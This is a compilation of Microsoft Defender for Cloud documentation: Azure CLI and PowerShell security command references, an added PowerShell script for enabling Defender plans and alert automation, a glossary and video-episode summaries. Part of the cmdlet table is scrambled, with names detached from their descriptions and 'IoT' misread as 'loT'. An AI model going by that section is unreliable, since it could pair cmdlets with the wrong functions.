az security auto-provisioning-setting list | List the auto provisioning settings. | Core | GA
az security auto-provisioning-setting show | Shows an auto provisioning setting. | Core | GA
az security auto-provisioning-setting update | Updates your automatic provisioning settings on the subscription. | Core | GA
az security automation | View your security automations. | Core | GA
az security automation-action-event-hub | Creates security automation event hub action. | Core | GA
az security automation-action-event-hub create | Creates security automation event hub action. | Core | GA
az security automation-action-logic-app | Creates security automation logic app action. | Core | GA
az security automation-action-logic-app create | Creates security automation logic app action. | Core | GA
az security automation-action-workspace | Creates security automation workspace action. | Core | GA
az security automation-action-workspace create | Creates security automation workspace action. | Core | GA
az security automation-rule | Creates security automation rule. | Core | GA
az security automation-rule-set | Creates security automation rule set. | Core | GA


Name | Description | Type | Status
az security automation-rule-set create | Creates security automation rule set. | Core | GA
az security automation-rule create | Creates security automation rule. | Core | GA
az security automation-scope | Creates security automation scope. | Core | GA
az security automation-scope create | Creates security automation scope. | Core | GA
az security automation-source | Creates security automation source. | Core | GA
az security automation-source create | Creates security automation source. | Core | GA
az security automation create_or_update | Creates or updates a security automation. | Core | GA
az security automation delete | Deletes a security automation. | Core | GA
az security automation list | List all security automations under subscription/resource group. | Core | GA
az security automation show | Shows a security automation. | Core | GA
az security automation validate | Validates a security automation model before create or update. | Core | GA
az security contact | View your security contacts. | Core | GA
az security contact create | Creates a security contact. | Core | GA
az security contact delete | Deletes a security contact. | Core | GA
az security contact list | List security contacts. | Core | GA
az security contact show | Shows a security contact. | Core | GA
az security discovered-security-solution | View your discovered security solutions. | Core | GA
az security discovered-security-solution list | List the discovered security solutions. | Core | GA
az security discovered-security-solution show | Shows a discovered security solution. | Core | GA
az security external-security-solution | View your external security solutions. | Core | GA


Name | Description | Type | Status
az security external-security-solution list | List the external security solutions. | Core | GA
az security external-security-solution show | Shows an external security solution. | Core | GA
az security iot-alerts | View IoT Security aggregated alerts. | Core | GA
az security iot-alerts delete | Dismiss an aggregated IoT Security Alert. | Core | GA
az security iot-alerts list | List all your IoT Security solution aggregated alerts. | Core | GA
az security iot-alerts show | Shows a single aggregated alert of your IoT Security solution. | Core | GA
az security iot-analytics | View IoT Security Analytics metrics. | Core | GA
az security iot-analytics list | List all IoT Security Analytics metrics. | Core | GA
az security iot-analytics show | Shows IoT Security Analytics metrics. | Core | GA
az security iot-recommendations | View IoT Security aggregated recommendations. | Core | GA
az security iot-recommendations list | List all your IoT Security solution aggregated recommendations. | Core | GA
az security iot-recommendations show | Shows a single aggregated recommendation of your IoT Security solution. | Core | GA
az security iot-solution | Manage your IoT Security solution. | Core | GA
az security iot-solution create | Create your IoT Security solution. | Core | GA
az security iot-solution delete | Delete your IoT Security solution. | Core | GA
az security iot-solution list | List all IoT Security solutions. | Core | GA
az security iot-solution show | Shows an IoT Security solution. | Core | GA
az security iot-solution update | Update your IoT Security solution. | Core | GA
az security jit-policy | Manage your Just in Time network access policies. | Core | GA
az security jit-policy list | List your Just in Time network access policies. | Core | GA
az security jit-policy show | Shows a Just in Time network access policy. | Core | GA


Name | Description | Type | Status
az security location | Shows the Microsoft Defender for Cloud Home region location. | Core | GA
az security location list | Shows the Microsoft Defender for Cloud Home region location. | Core | GA
az security location show | Shows the Microsoft Defender for Cloud Home region location. | Core | GA
az security pricing | Enables managing the Azure Defender plan for the subscription. | Core | GA
az security pricing create | Updates the Azure Defender plan for the subscription. | Core | GA
az security pricing list | Shows the Azure Defender plans for the subscription. | Core | GA
az security pricing show | Shows the Azure Defender plan for the subscription. | Core | GA
az security regulatory-compliance-assessments | Regulatory compliance assessments. | Core | GA
az security regulatory-compliance-assessments list | Get details and state of assessments mapped to selected regulatory compliance control. | Core | GA
az security regulatory-compliance-assessments show | Shows supported regulatory compliance details and state for selected assessment. | Core | GA
az security regulatory-compliance-controls | Regulatory compliance controls. | Core | GA
az security regulatory-compliance-controls list | List supported regulatory compliance controls details and state for selected standard. | Core | GA
az security regulatory-compliance-controls show | Shows a regulatory compliance details state for selected standard. | Core | GA
az security regulatory-compliance-standards | Regulatory compliance standards. | Core | GA
az security regulatory-compliance-standards list | List supported regulatory compliance standards details and state results. | Core | GA
az security regulatory-compliance-standards show | Shows a regulatory compliance details state for selected standard. | Core | GA


Name | Description | Type | Status
az security secure-score-control-definitions | Secure score control definitions. | Core | GA
az security secure-score-control-definitions list | Get details of secure score control definitions. | Core | GA
az security secure-score-controls | Secure score controls. | Core | GA
az security secure-score-controls list | List supported secure score controls details and state for scope. | Core | GA
az security secure-score-controls list_by_score | List supported secure score controls details and state for selected score. | Core | GA
az security secure-scores | Secure scores. | Core | GA
az security secure-scores list | List of secure-scores details and state results. | Core | GA
az security secure-scores show | Shows a secure score details for selected initiative. | Core | GA
az security security-solutions | Display all security solutions at the subscription level. | Core | GA
az security security-solutions-reference-data | Display all security solutions reference data at the subscription level. | Core | GA
az security security-solutions-reference-data list | Display all security solutions reference data at the subscription level. | Core | GA
az security security-solutions list | Display all security solutions at the subscription level. | Core | GA
az security setting | View your security settings. | Core | GA
az security setting list | List security settings. | Core | GA
az security setting show | Shows a security setting. | Core | GA
az security setting update | Updates a security setting. | Core | GA
az security sub-assessment | View your security sub assessments. | Core | GA
az security sub-assessment list | List all security sub assessment results. | Core | GA
az security sub-assessment show | Shows a security sub assessment. | Core | GA
az security task | View security tasks (recommendations). | Core | GA
az security task list | List security tasks (recommendations). | Core | GA


Name | Description | Type | Status
az security task show | Shows a security task (recommendation). | Core | GA
az security topology | Shows the network topology in your subscription. | Core | GA
az security topology list | Shows the network topology in your subscription. | Core | GA
az security topology show | Shows the network topology in your subscription. | Core | GA
az security va | View Vulnerability Assessment. | Core | GA
az security va sql | View Sql Vulnerability Assessment scan results and manage baseline. | Core | GA
az security va sql baseline | View and manage Sql Vulnerability Assessment baseline. | Core | GA
az security va sql baseline delete | Delete Sql Vulnerability Assessment rule baseline. | Core | GA
az security va sql baseline list | View Sql Vulnerability Assessment baseline for all rules. | Core | GA
az security va sql baseline set | Sets Sql Vulnerability Assessment baseline. Replaces the current baseline. | Core | GA
az security va sql baseline show | View Sql Vulnerability Assessment rule baseline. | Core | GA
az security va sql baseline update | Update Sql Vulnerability Assessment rule baseline. Replaces the current rule baseline. | Core | GA
az security va sql results | View Sql Vulnerability Assessment scan results. | Core | GA
az security va sql results list | View all Sql Vulnerability Assessment scan results. | Core | GA
az security va sql results show | View Sql Vulnerability Assessment scan results. | Core | GA
az security va sql scans | View Sql Vulnerability Assessment scan summaries. | Core | GA
az security va sql scans list | List all Sql Vulnerability Assessment scan summaries. | Core | GA


Name | Description | Type | Status
az security va sql scans show | View Sql Vulnerability Assessment scan summaries. | Core | GA
az security workspace-setting | Shows the workspace settings in your subscription - these settings let you control which workspace will hold your security data. | Core | GA
az security workspace-setting create | Creates workspace settings in your subscription - these settings let you control which workspace will hold your security data. | Core | GA
az security workspace-setting delete | Deletes the workspace settings in your subscription - this will make the security events on the subscription be reported to the default workspace. | Core | GA
az security workspace-setting list | Shows the workspace settings in your subscription - these settings let you control which workspace will hold your security data. | Core | GA
az security workspace-setting show | Shows the workspace settings in your subscription - these settings let you control which workspace will hold your security data. | Core | GA


Az.Security

Reference

Azure Security Center gives you control over the security of your Azure subscriptions and other machines that you connected to it outside of Azure.

Security

Name | Description
Add-AzSecurityAdaptiveNetworkHardening | Enforces the given rules on the NSG(s) listed in the request
Add-AzSecuritySqlVulnerabilityAssessmentBaseline | Add SQL vulnerability assessment baseline.
Confirm-AzSecurityAutomation | Validates the security automation model before create or update. Any validation errors are returned to the client
Disable-AzIotSecurityAnalyticsAggregatedAlert | Dismiss IoT aggregated alert
Disable-AzSecurityAdvancedThreatProtection | Disables the advanced threat protection policy for a storage / cosmosDB account.
Enable-AzSecurityAdvancedThreatProtection | Enables the advanced threat protection policy for a storage / cosmosDB account.
Get-AzAlertsSuppressionRule | Gets alerts suppression rules.
Get-AzAllowedConnection | Used to display allowed traffic between resources for the subscription
Get-AzDeviceSecurityGroup | Get device security group (IoT Hub security)
Get-AzDiscoveredSecuritySolution | Gets security solutions that were discovered by Azure Security Center
Get-AzExternalSecuritySolution | Get external security solution
Get-AzIotSecurityAnalytics | Get IoT security analytics
Get-AzIotSecurityAnalyticsAggregatedAlert | Get IoT security aggregated alert
Get-AzIotSecurityAnalyticsAggregatedRecommendation | Get IoT security aggregated recommendation
Get-AzIotSecuritySolution | Get IoT security solution
Get-AzJitNetworkAccessPolicy | Gets the JIT network access policies
Get-AzRegulatoryComplianceAssessment | Gets regulatory compliance assessments
Get-AzRegulatoryComplianceControl | Gets regulatory compliance controls
Get-AzRegulatoryComplianceStandard | Gets regulatory compliance standards
Get-AzSecurityAdaptiveApplicationControl | Gets a list of application control VM/server groups for the subscription.
Get-AzSecurityAdaptiveApplicationControlGroup | Gets an application control VM/server group.
Get-AzSecurityAdaptiveNetworkHardening | Gets a list of Adaptive Network Hardenings resources in scope of an extended resource.
Get-AzSecurityAdvancedThreatProtection | Gets the advanced threat protection policy for a storage / cosmosDB account.
Get-AzSecurityAlert | Gets security alerts that were detected by Azure Security Center
Get-AzSecurityAssessment | Gets security assessments and their results on a subscription
Get-AzSecurityAssessmentMetadata | Gets security assessments types and metadata in a subscription.
Get-AzSecurityAutomation | Gets security automations
Get-AzSecurityAutoProvisioningSetting | Gets the security automatic provisioning settings
Get-AzSecurityCompliance | Get the security compliance of a subscription over time
Get-AzSecurityContact | Gets security contacts that were configured on this subscription
Get-AzSecurityLocation | Gets the location where Azure Security Center will automatically save data for the specific subscription
Get-AzSecurityPricing | Gets the Azure Defender plans for a subscription in Azure Security Center.
Get-AzSecuritySecureScore | Gets security secure scores and their results on a subscription
Get-AzSecuritySecureScoreControl | Gets security secure score controls and their results on a subscription
Get-AzSecuritySecureScoreControlDefinition | Gets security secure score control definitions on a subscription
Get-AzSecuritySetting | Get security settings in Azure Security Center
Get-AzSecuritySolution | Get Security Solutions
Get-AzSecuritySolutionsReferenceData | Get Security Solutions Reference Data
Get-AzSecuritySqlVulnerabilityAssessmentBaseline | Get SQL vulnerability assessment baseline.
Get-AzSecuritySqlVulnerabilityAssessmentScanRecord | Gets SQL vulnerability assessment scan summary.
Get-AzSecuritySqlVulnerabilityAssessmentScanResult | Gets SQL vulnerability assessment scan results.
Get-AzSecuritySubAssessment | Gets sub assessments results in a subscription.
Get-AzSecurityTask | Gets the security tasks that Azure Security Center recommends you to do in order to strengthen your security posture.
Get-AzSecurityTopology | Gets a list of Security Topologies on a subscription
Get-AzSecurityWorkspaceSetting | Gets the configured security workspace settings on a subscription.
Get-AzSqlInformationProtectionPolicy | Retrieves the effective tenant SQL information protection policy.
New-AzAlertsSuppressionRuleScope | Helper cmdlet to create PSIScopeElement.
New-AzDeviceSecurityGroupAllowlistCustomAlertRuleObject | Create new allow list custom alert rule for device security group (IoT Security)
New-AzDeviceSecurityGroupDenylistCustomAlertRuleObject | Create new deny list custom alert rule for device security group (IoT Security)
New-AzDeviceSecurityGroupThresholdCustomAlertRuleObject | Create new threshold custom alert
New-AzDeviceSecurityGroupTimeWindowRuleObject
New-AzIotSecuritySolutionRecommendationConfigurationObject
New-AzIotSecuritySolutionUserDefinedResourcesObject
New-AzSecurityAutomation
New-AzSecurityAutomationActionObject
New-AzSecurityAutomationRuleObject
New-AzSecurityAutomationRuleSetObject
New-AzSecurityAutomationScopeObject
New-AzSecurityAutomationSourceObject
Remove-AzAlertsSuppressionRule
Remove-AzDeviceSecurityGroup
Remove-AzIotSecuritySolution
Remove-AzJitNetworkAccessPolicy
Remove-AzSecurityAssessment
rule for device security group (loT 
Security) 


Create new time window rule for 
device security group (loT Security) 


Create new recommendation 
configuration for iot security 
solution 


Create new user defined resources 
for iot security solution 


Creates new security automation 


Creates new security automation 
action object 


Creates security automation rule 
object 


Creates security automation rule set 
object 


Creates security automation scope 
object 


Creates security automation source 
object 


Deletes an alerts suppression rule. 
Delete device security group 
Delete loT security solution 

Deletes a JIT network access policy. 


Deletes a security assessment result 
from a subscription. 


Remove-AzSecurityAssessmentMetadata 


Remove-AzSecurityAutomation 


Remove-AzSecurityContact 


Remove-AzSecuritySqlVulnerabilityAssessmentBaseline 


Remove-AzSecurityWorkspaceSetting 


Set-AzAlertsSuppressionRule 


Set-AzDeviceSecurityGroup 


Set-AzlotSecuritySolution 


Set-AzJitNetworkAccessPolicy 
Set-AzSecurityAlert 


Set-AzSecurityAssessment 


Set-AzSecurityAssessmentMetadata 


Set-AzSecurityAutoProvisioningSetting 


Set-AzSecurityContact 


Set-AzSecurityPricing 


Deletes a security assessment 
metadata from a subscription. 


Deletes security automation 
Deletes a security contact. 


Removes SQL vulnerability 
assessment baseline. 


Deletes the security workspace 
setting for this subscription. 


Create or update an alerts 
suppression rule. 


Create or update device security 
group 


Create or update loT security 
solution 


Updates JIT network access policy. 
Updates a security alert state. 


Create or update a security 
assessment result on a resource 


Creates or updates a security 
assessment type. 


Updates automatic provisioning 
setting 


Updates a security contact for a 
subscription. 


Enables or disables Microsoft 
Defender plans for a subscription in 
Microsoft Defender for Cloud. 


©® Note 


For CloudPosture 
(Defender Cloud Security 
Posture Management), the 
agentless extensions E 
will not be enabled when 
using this command. To 


Set-AzSecuritySetting 


Set-AzSecuritySqlVulnerabilityAssessmentBaseline 


Set-AzSecurityWorkspaceSetting 


Set-AzSqllnformationProtectionPolicy 


Start-AzJitNetworkAccessPolicy 


Update-AzlotSecuritySolution 


enable extensions, please 
use the Azure Policy 
definition or scripts in the 
Microsoft Defender for 
Cloud Community 
Repository £. 


Update a security setting in Azure 
Security Center 


Sets new SQL vulnerability 
assessment baseline on a specific 
database discards old baseline if 
any exists. 


Updates the workspace settings for 
the subscription. 


Sets the effective tenant SQL 
information protection policy. 


Invokes a temporary network access 
request. 


Update one or more of the 
following properties in loT security 
solution: tags, recommendation 
configuration, user defined 
resources 
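The following script is an added example that strings several of the cmdlets in the reference above together; it is not Microsoft's sample code and is not part of the original reference. It assumes the Az.Accounts and Az.Security modules are installed and that Connect-AzAccount / Set-AzContext has already selected the target subscription. The plan names passed to Set-AzSecurityPricing are values that Get-AzSecurityPricing returns in its Name property; the resource group name, Logic App resource ID and callback URI are placeholders; the output property names used in the triage step (Severity, Status, TimeGeneratedUtc, AlertDisplayName, CompromisedEntity, Percentage) and the 'Severity' property path in the automation rule follow the Az.Security object model as the author of this example understands it, not anything stated on this page.

```powershell
#Requires -Modules Az.Accounts, Az.Security
# Added example, not Microsoft's own sample. Assumes a subscription context is already
# selected. Names, IDs and URIs marked "placeholder" must be replaced before use.

# --- 1. Turn on Defender plans that are still on the Free tier ------------------------
$plansToEnable = @('VirtualMachines', 'StorageAccounts', 'Containers')   # example selection

$pricing = Get-AzSecurityPricing
foreach ($plan in $plansToEnable) {
    $entry = $pricing | Where-Object { $_.Name -eq $plan }
    if ($null -eq $entry) {
        Write-Warning "Plan '$plan' is not offered in this subscription; skipping."
        continue
    }
    if ($entry.PricingTier -eq 'Standard') {
        Write-Host "$plan is already enabled"
        continue
    }
    # Caveat from the cmdlet reference: for the CloudPosture plan this call does NOT
    # enable the agentless extensions; use the Azure Policy definition or the community
    # repository scripts for those.
    Set-AzSecurityPricing -Name $plan -PricingTier 'Standard' | Out-Null
    Write-Host "Enabled $plan"
}

# --- 2. Forward high-severity alerts to a Logic App with a security automation --------
$subId  = (Get-AzContext).Subscription.Id
$rgName = 'rg-security-ops'                                               # placeholder

$scope   = New-AzSecurityAutomationScopeObject -Description 'Whole subscription' `
                                               -ScopePath "/subscriptions/$subId"
# Trigger only on alerts whose Severity equals High. The property path 'Severity' is an
# assumption about the alert event payload.
$rule    = New-AzSecurityAutomationRuleObject -PropertyJPath 'Severity' -PropertyType 'String' `
                                              -ExpectedValue 'High' -Operator 'Equals'
$ruleSet = New-AzSecurityAutomationRuleSetObject -Rule $rule
$source  = New-AzSecurityAutomationSourceObject -EventSource 'Alerts' -RuleSet $ruleSet
$action  = New-AzSecurityAutomationActionObject `
    -LogicAppResourceId "/subscriptions/$subId/resourceGroups/$rgName/providers/Microsoft.Logic/workflows/notify-soc" `
    -Uri 'https://PLACEHOLDER.logic.azure.com/workflows/PLACEHOLDER/triggers/manual/paths/invoke'

New-AzSecurityAutomation -Name 'forward-high-severity-alerts' -ResourceGroupName $rgName `
    -Location 'eastus' -Scope $scope -Source $source -Action $action | Out-Null

# --- 3. Triage what is already open ----------------------------------------------------
# Property names below follow the Az.Security alert object model (assumption, see lead-in).
Get-AzSecurityAlert |
    Where-Object { $_.Severity -eq 'High' -and $_.Status -eq 'Active' } |
    Sort-Object TimeGeneratedUtc -Descending |
    Select-Object TimeGeneratedUtc, AlertDisplayName, CompromisedEntity |
    Format-Table -AutoSize

# Secure score controls with the lowest completion percentage first: the controls where
# remediation moves the score the most.
Get-AzSecuritySecureScoreControl |
    Sort-Object Percentage |
    Select-Object DisplayName, Current, Max, Percentage -First 10 |
    Format-Table -AutoSize
```

Step 2 is the scripted equivalent of a workflow automation in the portal: the scope object limits which resources' events are considered, the rule set filters the event, and the action object names the Logic App (by resource ID plus its callback URI) that receives the alert. Run the script with -WhatIf support in mind: Set-AzSecurityPricing and New-AzSecurityAutomation change subscription state, so review the plan list and the scope path before executing in production.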


Defender for Cloud glossary 


Article • 08/13/2023


This glossary provides a brief description of important terms and concepts for the 
Microsoft Defender for Cloud platform. Select the Learn more links to go to related 
terms in the glossary. This glossary can help you to learn and use the product tools 
quickly and effectively. 


A 


AAC 


Adaptive application controls are an intelligent and automated solution for defining 
allowlists of known-safe applications for your machines. See Adaptive Application 
Controls. 


AAD 


Azure Active Directory (Azure AD) is a cloud-based identity and access management 
service. See Adaptive Application Controls. 


ACR Tasks 


A suite of features within Azure container registry. See Frequently asked questions - 
Azure Container Registry. 


Adaptive network hardening 


Adaptive network hardening provides recommendations to further harden the network 
security groups (NSG) rules. See What is Adaptive Network Hardening?. 


ADO 


Azure DevOps provides developer services for allowing teams to plan work, collaborate 
on code development, and build and deploy applications. See What is Azure DevOps? 


AKS 


Azure Kubernetes Service, Microsoft's managed service for developing, deploying, and 
managing containerized applications. See Kubernetes concepts. 


Alerts 


Alerts defend your workloads in real-time so you can react immediately and prevent 
security events from developing. See Security alerts and incidents. 


ANH 


Adaptive network hardening. Learn how to improve your network security posture with 
adaptive network hardening. 


APT 


Advanced Persistent Threats. See the video: Understanding APTs.


Arc-enabled Kubernetes 


Azure Arc-enabled Kubernetes allows you to attach and configure Kubernetes clusters 
running anywhere. You can connect your clusters running on other public cloud 
providers or clusters running on your on-premises data center. See What is Azure Arc- 
enabled Logic Apps? (Preview). 


ARG 


Azure Resource Graph, an Azure service designed to extend Azure Resource
Management by providing resource exploration with the ability to query at scale across 
a given set of subscriptions so that you can effectively govern your environment. See 
Azure Resource Graph Overview. 


ARM 


Azure Resource Manager, the deployment and management service for Azure. See Azure
Resource Manager overview. 


ASB 


Azure Security Benchmark provides recommendations on how you can secure your
cloud solutions on Azure. See Azure Security Benchmark.


Attack Path Analysis 


A graph-based algorithm that scans the cloud security graph, exposes attack paths and 
suggests recommendations as to how best remediate issues that will break the attack 
path and prevent successful breach. See What is attack path analysis?. 


Auto-provisioning 


To make sure that your server resources are secure, Microsoft Defender for Cloud uses 
agents installed on your servers to send information about your servers to Microsoft 
Defender for Cloud for analysis. You can use auto provisioning to deploy the Azure 
Monitor Agent on your servers. Learn how to configure auto provision. 


Azure Policy for Kubernetes 


A pod that extends the open-source Gatekeeper v3 and registers as a web hook to
Kubernetes admission control making it possible to apply at-scale enforcements, and 
safeguards on your clusters in a centralized, consistent manner. For more information, 
see Protect your Kubernetes workloads and Understand Azure Policy for Kubernetes 
clusters. 


B 


Bicep 


Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure 
resources. It provides concise syntax, reliable type safety, and support for code reuse. 
See Bicep tutorial. 


Blob storage 


Azure Blob Storage is the high scale object storage service for Azure and a key building 
block for data storage in Azure. See what is Azure blob storage?. 


C 


Cacls 


Change access control list, Microsoft Windows native command-line utility often used 
for modifying the security permission on folders and files. See Access control lists. 


CIS Benchmark 


(Kubernetes) Center for Internet Security benchmark. See CIS. 


Cloud security graph 


The cloud security graph is a graph-based context engine that exists within Defender for 
Cloud. The cloud security graph collects data from your multicloud environment and 
other data sources. See What is the cloud security graph?. 


CORS 


Cross origin resource sharing, an HTTP feature that enables a web application running 
under one domain to access resources in another domain. See CORS. 


CNAPP 


Cloud Native Application Protection Platform. See Build cloud native applications in
Azure.


CNCF


Cloud Native Computing Foundation. Learn how to build CNCF projects by using Azure
Kubernetes service.


CSPM


Cloud Security Posture Management. See Cloud Security Posture Management (CSPM).


CWPP 


Cloud Workload Protection Platform. See CWPP. 


D 


Data Aware Security Posture 


Data-aware security posture automatically discovers datastores containing sensitive
data, and helps reduce risk of data breaches. Learn about data-aware security posture.


Defender agent


The DaemonSet that is deployed on each node, collects signals from hosts using eBPF
technology, and provides runtime protection. The agent is registered with a Log
Analytics workspace, and used as a data pipeline. However, the audit log data isn't
stored in the Log Analytics workspace. It is deployed under AKS Security profile in AKS
clusters and as an Arc extension in Arc enabled Kubernetes clusters. For more
information, see Architecture for each Kubernetes environment.


DDOS Attack 


Distributed denial-of-service, a type of attack where an attacker sends more requests to 
an application than the application is capable of handling. See DDOS FAQs. 


E 


EASM 


External Attack Surface Management. See EASM Overview. 


EDR 


Endpoint Detection and Response. See Microsoft Defender for Endpoint. 


EKS 


Amazon Elastic Kubernetes Service, Amazon's managed service for running Kubernetes
on AWS without needing to install, operate, and maintain your own Kubernetes control
plane or nodes. See EKS.


eBPF


Extended Berkeley Packet Filter. See What is eBPF?


FIM


File Integrity Monitoring. Learn about File Integrity Monitoring in Microsoft Defender
for Cloud.


FTP 


File Transfer Protocol. Learn how to Deploy content using FTP. 


G 


GCP 


Google Cloud Platform. Learn how to onboard a GCP project.


GKE


Google Kubernetes Engine, Google's managed environment for deploying, managing,
and scaling applications using GCP infrastructure. See Deploy a Kubernetes workload
using GPU sharing on your Azure Stack Edge Pro.


Governance


A set of rules and policies adopted by companies that run services in the cloud. The goal
of cloud governance is to enhance data security, manage risk, and enable the smooth
operation of cloud systems. See Governance Overview.


IaaS


Infrastructure as a service, a type of cloud computing service that offers essential
compute, storage, and networking resources on demand, on a pay-as-you-go basis.
See What is IaaS?.


IAM


Identity and Access management. See Introduction to IAM.


JIT 


Just-in-Time VM access. Understanding just-in-time (JIT) VM access. 


K 


Kill Chain 


The series of steps that describe the progression of a cyberattack from reconnaissance
to data exfiltration. Defender for Cloud's supported kill chain intents are based on the
MITRE ATT&CK matrix. See MITRE Attack Matrix.


KQL 


Kusto Query Language - a tool to explore your data and discover patterns, identify 
anomalies and outliers, create statistical modeling, and more. KQL Overview. 


L 


LSA 


Local Security Authority. Learn how to secure and use policies on virtual machines in
Azure.


M 


MCSB 


Microsoft Cloud Security Benchmark. See MCSB in Defender for Cloud. 


MDC 


Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and
Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and
multicloud (Amazon AWS and Google GCP) resources. See What is Microsoft Defender for
Cloud?.


MDE 


Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to 
help enterprise networks prevent, detect, investigate, and respond to advanced threats. 
Protect your endpoints with Defender for Cloud's integrated EDR solution: Microsoft 
Defender for Endpoint. 


MDVM 


Microsoft Defender Vulnerability Management. Learn how to enable vulnerability 
scanning with Microsoft Defender Vulnerability Management. 


MFA 


Multi-factor authentication, a process in which users are prompted during the sign-in
process for an extra form of identification, such as a code on their cellphone or a
fingerprint scan. See How it works: Azure Multi Factor Authentication.


MITRE ATT&CK


A globally accessible knowledge base of adversary tactics and techniques based on
real-world observations. See MITRE ATT&CK.


MMA


Microsoft Monitoring Agent, also known as Log Analytics Agent. See Log Analytics Agent
Overview.


N 


NGAV 


Next Generation Anti-Virus 


NIST 


National Institute of Standards and Technology. See National Institute of Standards and
Technology.


NSG 


Network Security Group. Learn about network security groups (NSGs). 


P 


PaaS 


Platform as a service (PaaS) is a complete development and deployment environment in
the cloud, with resources that enable you to deliver everything from simple cloud-based
apps to sophisticated, cloud-enabled enterprise applications. See What is PaaS?.


R 


RaMP 


Rapid Modernization Plan, guidance based on initiatives, giving you a set of deployment 
paths to more quickly implement key layers of protection. Learn about Zero Trust Rapid 
Modernization Plan. 


RBAC 


Azure role-based access control (Azure RBAC) helps you manage who has access to 
Azure resources, what they can do with those resources, and what areas they have 
access to. RBAC Overview. 


RDP 


Remote Desktop Protocol (RDP) is a sophisticated technology that uses various 
techniques to perfect the server's remote graphics' delivery to the client device. RDP 
Bandwidth Requirements. 


Recommendations 


Recommendations secure your workloads with step-by-step actions that protect your
workloads from known security risks. See What are security policies, initiatives, and
recommendations?.


Regulatory Compliance 


Regulatory compliance refers to the discipline and process of ensuring that a company 
follows the laws enforced by governing bodies in their geography or rules required. 
Regulatory Compliance Overview. 


S 


SAS 


Shared access signature that provides secure delegated access to resources in your
storage account. See Storage SAS Overview.


SaaS


Software as a service (SaaS) allows users to connect to and use cloud-based apps over
the Internet. Common examples are email, calendaring, and office tools (such as
Microsoft Office 365). SaaS provides a complete software solution that you purchase on
a pay-as-you-go basis from a cloud service provider. See What is SaaS?.


Secure Score 


Defender for Cloud continually assesses your cross-cloud resources for security issues. It 
then aggregates all the findings into a single score that represents your current security 
situation: the higher the score, the lower the identified risk level. Learn more about 
security posture for Microsoft Defender for Cloud. 


Security Alerts 


Security alerts are the notifications generated by Defender for Cloud and Defender for
Cloud plans when threats are identified in your cloud, hybrid, or on-premises
environment. See What are security alerts?


Security Initiative 


A collection of Azure Policy Definitions, or rules, that are grouped together towards a 
specific goal or purpose. What are security policies, initiatives, and recommendations? 


Security Policy 


An Azure rule about specific security conditions that you want controlled. See
Understanding Security Policies.


SIEM


Security Information and Event Management. See What is SIEM?


SOAR 


Security Orchestration Automated Response, a collection of software tools designed to 
collect data about security threats from multiple sources and respond to low-level 
security events without human assistance. Learn more about SOAR. 


T 


TVM 


Threat and Vulnerability Management, a built-in module in Microsoft Defender for
Endpoint that can discover vulnerabilities and misconfigurations in near real time and
prioritize vulnerabilities based on the threat landscape and detections in your
organization. See Investigate weaknesses with Microsoft Defender for Endpoint's threat and
vulnerability management.


W 


WAF 


Web Application Firewall (WAF) provides centralized protection of your web applications 
from common exploits and vulnerabilities. Learn more about WAF. 


Z 


Zero Trust


A new security model that assumes breach and verifies each request as though it 
originated from an uncontrolled network. Learn more about Zero-Trust Security. 


Next steps 


Microsoft Defender for Cloud overview


New AWS connector in Microsoft 
Defender for Cloud 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, Or Serok joins
Yuri Diogenes to share the new AWS connector in Microsoft Defender for Cloud, which
was released at Ignite 2021. Or explains the use case scenarios for the new connector
and how the new connector works. She demonstrates the onboarding process to connect
AWS with Microsoft Defender for Cloud and talks about the centralized management of
all security recommendations.


• Introduction
• Understanding the new AWS connector.
• Overview of the new onboarding experience.
• 4:30 - Customizing recommendations for AWS workloads.
• 7:03 - Beyond CSPM capabilities.
• 11:14 - Demonstration of the recommendations and onboarding process.
• 23:20 - Demonstration of how to customize AWS assessments.


Recommended resources

• Learn more about the new AWS connector
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Integrate Azure Purview with Microsoft Defender for Cloud 


Integrate Microsoft Purview with 
Microsoft Defender for Cloud 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, David Trigano
joins Yuri Diogenes to share the new integration of Microsoft Defender for Cloud with
Microsoft Purview, which was released at Ignite 2021.


David explains the use case scenarios for this integration and how the data classification
done by Microsoft Purview can help prioritize recommendations and alerts in
Defender for Cloud. David also demonstrates the overall experience of data enrichment
based on the information that flows from Microsoft Purview to Defender for Cloud.


• Overview of Microsoft Purview
• Integration with Microsoft Defender for Cloud
• 3:48 - How the integration with Microsoft Purview helps to prioritize
  Recommendations in Microsoft Defender for Cloud
• 5:26 - How the integration with Microsoft Purview helps to prioritize Alerts in
  Microsoft Defender for Cloud
• 8:54 - Demonstration
• 16:50 - Final considerations


Recommended resources

• Learn more about the integration with Microsoft Purview.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Watch Episode 3 


Microsoft Defender for Containers 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, Maya Herskovic
joins Yuri Diogenes to talk about Microsoft Defender for Containers. Maya explains
what's new in Microsoft Defender for Containers, the new capabilities that are available,
the new pricing model, and the multicloud coverage. Maya also demonstrates the
overall experience of Microsoft Defender for Containers from the recommendations to
the alerts that you may receive.


• 1:09 - What's new in the Defender for Containers plan?
• 4:42 - Change in the host level protection
• 8:08 - How to migrate to the new plan?
• 9:28 - Onboarding requirements
• 11:45 - Improvements in the anomaly detection
• 13:27 - Demonstration
• 22:17 - Final considerations


Recommended resources

• Learn more about Microsoft Defender for Containers.
• Subscribe to Microsoft Security on YouTube
• Follow us on social media: LinkedIn, Twitter
• Join our Tech Community
• For more about Microsoft Security


Next steps 


Security posture management improvements 


Security posture management 
improvements in Microsoft Defender for 
Cloud 


Article • 04/27/2023


Episode description: In this episode of Defender for Cloud in the field, Lior Arviv joins
Yuri Diogenes to talk about the cloud security posture management improvements in
Microsoft Defender for Cloud. Lior explains the MITRE ATT&CK Framework integration
with recommendations, the overall improvements of recommendations and the other
fields added in the API. Lior also demonstrates the different ways to access the MITRE
ATT&CK integration via filters and recommendations.


• 1:24 - Security recommendation refresh time changes
• 3:50 - MITRE ATT&CK Framework mapping to recommendations
• 6:14 - Demonstration
• 14:44 - Secure Score API updates
• 18:54 - What's coming next


Recommended resources

